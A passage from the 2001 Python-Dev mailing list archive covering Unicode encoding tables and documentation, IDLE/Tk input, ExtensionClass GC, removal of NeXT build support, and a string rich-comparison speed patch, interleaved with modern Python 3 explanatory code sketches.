* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)
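Both options can be sketched in Python 3 on a toy decoding map, together with the ambiguity check Tim asks for. The byte values below are invented for illustration and are not the real cp875 table. `find_ambiguous`, `build_encoding_map` and `encode` are hypothetical helpers, not functions from the codecs module.

```python
# Toy decoding map {byte: code point}. The values are invented for
# illustration; they are not the real cp875 table.
TOY_DECODING_MAP = {
    0x41: 0x0041,  # 'A'
    0x42: 0x0042,  # 'B'
    0x5F: 0x00AC,  # two different bytes decode to U+00AC ...
    0xFD: 0x00AC,  # ... so inverting the map is ambiguous
}


def find_ambiguous(decoding_map):
    """Return {code point: sorted bytes} for code points with several sources."""
    sources = {}
    for byte, cp in decoding_map.items():
        sources.setdefault(cp, []).append(byte)
    return {cp: sorted(bs) for cp, bs in sources.items() if len(bs) > 1}


def build_encoding_map(decoding_map, strategy="sorted"):
    """Invert a decoding map into {code point: byte or None}.

    "sorted": visit bytes in ascending order and keep the first (lowest)
              byte for each code point, so the result never depends on
              dictionary iteration order.
    "none":   map every ambiguous code point to None (undefined mapping).
    """
    if strategy not in ("sorted", "none"):
        raise ValueError("unknown strategy: %r" % (strategy,))
    ambiguous = find_ambiguous(decoding_map)
    encoding_map = {}
    for byte, cp in sorted(decoding_map.items()):
        if strategy == "none" and cp in ambiguous:
            encoding_map[cp] = None
        else:
            encoding_map.setdefault(cp, byte)
    return encoding_map


def encode(text, encoding_map):
    """Strict encoder: missing or None entries raise an error."""
    out = bytearray()
    for ch in text:
        byte = encoding_map.get(ord(ch))
        if byte is None:
            raise UnicodeError("undefined mapping for %r" % ch)
        out.append(byte)
    return bytes(out)


print(find_ambiguous(TOY_DECODING_MAP))                    # {172: [95, 253]}
print(build_encoding_map(TOY_DECODING_MAP)[0xAC])          # 95
print(build_encoding_map(TOY_DECODING_MAP, "none")[0xAC])  # None
```

With the "none" strategy, encoding U+00AC raises instead of silently picking one of the two bytes. That is the "refuse the temptation to guess" behaviour, applied on the encoder side only.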

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Mon May 14 10:15:43 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far as it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg


From jack@oratrix.nl  Mon May 14 10:55:26 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik@pythonware.com  Mon May 14 11:18:49 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrence was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis@informatik.hu-berlin.de  Mon May 14 12:29:21 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types non-ASCII character into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correct IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis@informatik.hu-berlin.de  Mon May 14 12:41:26 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
 from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH@ActiveState.com  Mon May 14 13:20:43 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry@digicool.com  Mon May 14 13:54:59 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
 <3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal@lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr@thyrsus.com  Mon May 14 16:11:57 2001
From: esr@thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik@pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip@pobox.com (Skip Montanaro)  Mon May 14 16:54:54 2001
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completely confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g@Virginia.EDU  Mon May 14 18:04:56 2001
From: sdm7g@Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
 it's broken for OSX,
 if it worked, it doesn't do the whole job ( I think framework 
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and headers files in one bundle. ) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversible decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
them useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thoughts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've thought more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido@digicool.com  Mon May 14 21:53:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
 <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 20:40:21 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
 <200105122108.QAA09951@cj20424-a.reston1.va.home.com>
 <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completely confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling.

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim@digicool.com  Mon May 14 21:12:44 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.
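One way to pull apart the two effects mixed together in these loops is to time an empty statement as a baseline and subtract it, so that loop overhead mostly cancels out. The sketch below uses the standard `timeit` module on a modern Python 3. The helper name `net_cost` is hypothetical, the subtraction is only approximate, and absolute numbers will not match the 2001 figures above.

```python
import timeit


def net_cost(stmt, setup="pass", number=100000, repeat=5):
    """Best-of-`repeat` time for `number` runs of `stmt`, minus the
    best time for the same number of runs of an empty statement."""
    # Taking the minimum filters out interference from other processes.
    total = min(timeit.repeat(stmt, setup=setup, number=number, repeat=repeat))
    baseline = min(timeit.repeat("pass", setup=setup, number=number, repeat=repeat))
    return total - baseline


# Bind the operands to names so the comparison is really executed each time.
SETUP = "a = 'ab'; b = 'cd'; x = 2; y = 3"

if __name__ == "__main__":
    print("str <: %.4f s" % net_cost("a < b", SETUP))
    print("int <: %.4f s" % net_cost("x < y", SETUP))
```

Because `timeit` runs its own `for` loop around the statement, a faster interpreter loop shrinks the baseline instead of hiding a slower comparison.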

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 21:34:35 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for building Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 23:06:57 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op) {
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 14 22:55:39 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently got

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.

Please let me know what you think.

Martin

Index: stringobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v
retrieving revision 2.115
diff -u -r2.115 stringobject.c
--- stringobject.c	2001/05/10 00:32:57	2.115
+++ stringobject.c	2001/05/14 21:36:36
@@ -596,6 +596,51 @@
 	return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0;
 }
 
+/* In the signature, only a is guaranteed to be a PyStringObject.
+   However, as the first thing in the function, we check that b
+   is of that type also.  */
+
+static PyObject*
+string_richcompare(PyStringObject *a, PyStringObject *b, int op)
+{
+	int c;
+	PyObject *result;
+	if (!PyString_Check(b)) {
+		result = Py_NotImplemented;
+		goto out;
+	}
+	if (op == Py_EQ) {
+		if (a->ob_size != b->ob_size) {
+			result = Py_False;
+			goto out;
+		}
+#ifdef CACHE_HASH
+		if (a->ob_shash != b->ob_shash
+		    && a->ob_shash != -1 
+		    && b->ob_shash != -1) {
+			result = Py_False;
+			goto out;
+		}
+#endif
+	}
+	c = string_compare(a, b);
+	switch (op) {
+	case Py_LT: c = c <  0; break;
+	case Py_LE: c = c <= 0; break;
+	case Py_EQ: c = c == 0; break;
+	case Py_NE: c = c != 0; break;
+	case Py_GT: c = c >  0; break;
+	case Py_GE: c = c >= 0; break;
+	default:
+		result = Py_NotImplemented;
+		goto out;
+	}
+	result = c ? Py_True : Py_False;
+  out:
+	Py_INCREF(result);
+	return result;
+}
+
 static long
 string_hash(PyStringObject *a)
 {
@@ -2409,6 +2454,12 @@
 	&string_as_buffer,	/*tp_as_buffer*/
 	Py_TPFLAGS_DEFAULT,	/*tp_flags*/
 	0,		/*tp_doc*/
+	0,		/*tp_traverse*/
+	0,		/*tp_clear*/
+	(richcmpfunc)string_richcompare,	/*tp_richcompare*/
+	0,		/*tp_weaklistoffset*/
+	0,		/*tp_iter*/
+	0,		/*tp_iternext*/
 };
 
 void

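The control flow of the patched `string_richcompare` can be modelled in Python 3. The model makes the EQ fast paths explicit: a length mismatch, or two cached hashes that differ, proves inequality without comparing characters. Everything else falls back to a three-way compare mapped through the same switch. This is a sketch, not CPython code. `None` stands in for the C code's `-1` "hash not computed yet" marker, and the string op names are hypothetical stand-ins for `Py_LT` and friends.

```python
def three_way(a, b):
    """Return -1, 0 or 1, like string_compare() in the patch."""
    return (a > b) - (a < b)


# Map each rich-comparison op to a test on the three-way result,
# mirroring the switch statement in the patch.
OUTCOME = {
    "lt": lambda c: c < 0,
    "le": lambda c: c <= 0,
    "eq": lambda c: c == 0,
    "ne": lambda c: c != 0,
    "gt": lambda c: c > 0,
    "ge": lambda c: c >= 0,
}


def string_richcompare(a, b, op, hash_a=None, hash_b=None):
    """Model of the patched slot; hash_a/hash_b are cached hashes or None."""
    if not isinstance(b, str):
        return NotImplemented
    if op == "eq":
        if len(a) != len(b):
            return False  # strings of different sizes can never be equal
        if hash_a is not None and hash_b is not None and hash_a != hash_b:
            return False  # equal strings always have equal hashes
    if op not in OUTCOME:
        return NotImplemented
    return OUTCOME[op](three_way(a, b))


print(string_richcompare("ab", "cd", "lt"))   # True
print(string_richcompare("ab", "abc", "eq"))  # False (length check)
print(string_richcompare("ab", 3, "lt"))      # NotImplemented
```

The patch only applies the shortcuts to `Py_EQ`; `Py_NE` could reuse the same two tests with the answer inverted.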

From gstein@lyra.org  Mon May 14 23:17:56 2001
From: gstein@lyra.org (Greg Stein)
Date: Mon, 14 May 2001 15:17:56 -0700
Subject: [Python-Dev] Comparison speed
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
Message-ID: <20010514151755.P1374@lyra.org>

On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote:
>...
> Anybody care to take a stab at making the new richcmp and/or coerce code
> ugly again?
> 
> speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim

Euh... isn't Guido's preference for cleanliness over speed?

Cheers,
-g

-- 
Greg Stein, http://www.lyra.org/


From tim@digicool.com  Mon May 14 23:35:33 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 14 May 2001 18:35:33 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010514151755.P1374@lyra.org>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEIGCAAA.tim@digicool.com>

[Greg Stein]
> Euh... isn't Guido's preference for cleanliness over speed?

So do both.


From greg@cosc.canterbury.ac.nz  Tue May 15 02:42:49 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 15 May 2001 13:42:49 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>:

> I also missed support for the
> relationship between identity and equality.

That would severely restrict the semantics that could be given
to the comparison operators by overloading them.
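IEEE floating-point NaN is a concrete case of what Greg describes: the same object is not equal to itself, so a blanket `v == w` shortcut in the comparison operator would return the wrong answer. The small Python 3 sketch below shows this. The final list comparison reflects modern CPython, which does apply an identity shortcut inside container comparisons; it does not describe the 2001 code.

```python
nan = float("nan")

# Identity holds, but IEEE 754 says NaN compares unequal to everything,
# including itself, and the == operator honours that.
print(nan is nan)      # True
print(nan == nan)      # False
print(nan != nan)      # True

# Container comparisons in modern CPython check identity before calling ==,
# so the same object inside two lists makes the lists compare equal.
print([nan] == [nan])  # True
```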

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@digicool.com  Tue May 15 03:40:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 21:40:33 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST."
 <20010514151755.P1374@lyra.org>
References: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>
 <20010514151755.P1374@lyra.org>
Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com>

> > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim
> 
> Euh... isn't Guido's preference for cleanliness over speed?

Yeah, Tim & I have developed a nice good-cop-bad-cop routine about
this. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Tue May 15 04:36:42 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 14 May 2001 23:36:42 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDNKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> When stepping through the code, I also missed support for the
> relationship between identity and equality. E.g. in
> PyObject_RichCompare, I'd expect
>
>   if (v == w) {
>      switch (op) {
>      case Py_EQ:case Py_LE:case Py_GE:
>         Py_INCREF(Py_True);
>         return Py_True;
>      case Py_NE:case Py_LT:case Py_GT:
>         Py_INCREF(Py_False);
>         return Py_False;
>      }
>   }
>
> That would not help in your case, of course. I don't even know how
> frequent comparing identical objects is in real life - but this is
> something that PyObject_Compare has that PyObject_RichCompare
> currently doesn't.

